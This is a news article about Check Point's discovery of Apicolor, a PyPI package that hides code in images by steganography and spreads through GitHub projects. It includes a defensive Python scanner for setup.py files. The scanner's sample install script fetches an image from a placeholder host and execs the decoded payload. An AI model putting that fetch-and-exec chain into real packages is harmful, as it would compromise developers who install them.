
GitHub Abused to Distribute Malicious Packages on PyPI in Image Files

The Check Point CloudGuard Spectral Data Science team has detected a new malicious package on the Python Package Index (PyPI) repository that hides code in images using a steganographic technique. The malicious package is being delivered to users through open-source projects hosted on GitHub.

The new alert came just days after Python developers were warned of malicious packages swapping out their crypto addresses.

Detailed Analysis

According to Check Point, the malicious package was found in the PyPI software repository for the Python programming language and is designed to hide code in images via steganography, that is, concealing code inside image data so that it is not visible as code.

[Image: the actual image used in the attack (Image: Check Point)]

The campaign’s modus operandi, infecting PyPI users through open-source projects, shows that the attackers planned this campaign thoroughly. It also highlights that PyPI-related obfuscation techniques are continually evolving.

Malicious Package Details

Check Point’s blog post noted that the malicious package was named Apicolor. Initially, it appeared to be just another in-development package on PyPI, but a deeper probe into its installation script revealed a “strange, non-trivial code section at the beginning,” according to the advisory.

[Image: Check Point]

This code manually installed additional requirements and downloaded an image from the web. It then used the newly installed package to process the image and ran the output of that processing with the exec command.
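The install-time chain described above (install extra requirements, fetch an image, decode it, exec the result) can be spotted statically before a package is ever installed. The following is an added example, not Check Point's tooling or anything from the Apicolor package: it parses a setup.py with Python's ast module and reports which stages of that chain appear; the sample setup script and the indicator names it matches on are constructed for the demonstration.

```python
import ast

# Call-name suffixes for each stage the article describes: install extra
# requirements, fetch an image, decode it, run the decoded output.
INDICATORS = {
    "package_install": ("subprocess.check_call", "subprocess.run", "pip.main"),
    "network_fetch": ("urlopen", "urlretrieve", "requests.get"),
    "image_decoding": ("Image.open", "lsb.reveal"),
    "dynamic_exec": ("exec", "eval"),
}

# Constructed sample setup.py mirroring that behaviour; parsed only, never run.
SAMPLE_SETUP_PY = '''
import subprocess, sys
subprocess.check_call([sys.executable, "-m", "pip", "install", "requests", "pillow"])
import requests
from PIL import Image
from io import BytesIO
img = Image.open(BytesIO(requests.get("http://example.invalid/logo.png").content))
payload = decode_hidden_text(img)  # placeholder for the steganographic extraction
exec(payload)
from setuptools import setup
setup(name="demo")
'''

def _dotted_name(node: ast.AST) -> str:
    """Flatten a.b.c to 'a.b.c'; a non-static base such as foo().bar keeps only 'bar'."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted_name(node.value)
        return f"{base}.{node.attr}" if base else node.attr
    return ""

def scan_setup_script(source: str) -> dict:
    """Map each indicator stage to the line numbers of matching calls in the script."""
    hits = {}
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        name = _dotted_name(node.func)
        for stage, suffixes in INDICATORS.items():
            if any(name == s or name.endswith("." + s) for s in suffixes):
                hits.setdefault(stage, []).append(node.lineno)
    return hits

def is_suspicious(source: str) -> bool:
    """Flag install-time code that both fetches from the network and runs dynamic code."""
    hits = scan_setup_script(source)
    return "network_fetch" in hits and "dynamic_exec" in hits
```

Run `scan_setup_script` over the setup.py of any sdist before installing it; a hit in every stage is a strong signal, while network fetch plus exec alone is already worth a manual review.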

An unsuspecting user who finds one of these open-source GitHub projects while searching the web for a legitimate project installs it without realizing that it imports, and therefore fetches, the malicious package.

“It’s important to note that the code seems to work. In some cases, there are empty malicious packages.”

Check Point

It is worth noting that this malicious package differs from all previously discovered packages in that it can camouflage its capabilities in different ways. Moreover, it reaches its victims indirectly: PyPI users are targeted and infected through GitHub projects that import the malicious package.

Check Point urges users to run code scanners against third-party packages and to double-check them before using them. It is also important to verify that a project’s GitHub ratings have not been synthetically created.


Author

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism
